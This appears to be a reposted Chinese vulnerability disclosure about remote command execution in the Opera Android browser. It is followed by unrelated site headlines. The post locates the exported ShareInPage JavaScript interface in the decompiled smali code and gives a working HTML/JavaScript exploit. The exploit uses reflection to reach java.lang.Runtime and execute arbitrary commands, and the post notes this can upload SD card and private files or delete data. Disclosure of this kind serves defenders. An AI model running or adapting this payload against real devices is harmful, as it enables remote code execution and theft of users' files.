欧鹏手机浏览器存在远程命令执行
漏洞存在于欧鹏浏览器中,不需要root即可,addJavascriptInterface导出多处。
欧鹏浏览器,反编译后com/opera/android/share/ShareInPage.smali中,存在
const-string v1, "ShareInPage"
invoke-virtual {p1, v0, v1}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
这里使用导出的ShareInPage,还有其他导出到js的java类也可以使用,欧鹏浏览器导出了多处,都注意下吧。
构造exploit部分内容如下:(html文件)
<script>function execute(cmdArgs){alert(typeof(ShareInPage));return ShareInPage.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}
跟上一个漏洞一样,调用后可以执行命令,可以做很多事情,例如上传sd卡文件,上传私有目录下的可读文件、删除文件等等。
修复方案:
限制下吧
>更多相关文章
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 04-29通用智能人“通通”亮相中关村论坛
- 04-29拼多多投入45亿补贴,助力上海“五五购物节
- 04-29通义千问再开源 推出最大尺寸1100亿参数模型
- 04-29【环球视线】比亚迪交付首列出海云轨
- 04-21中国产品数字护照体系加速建设
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御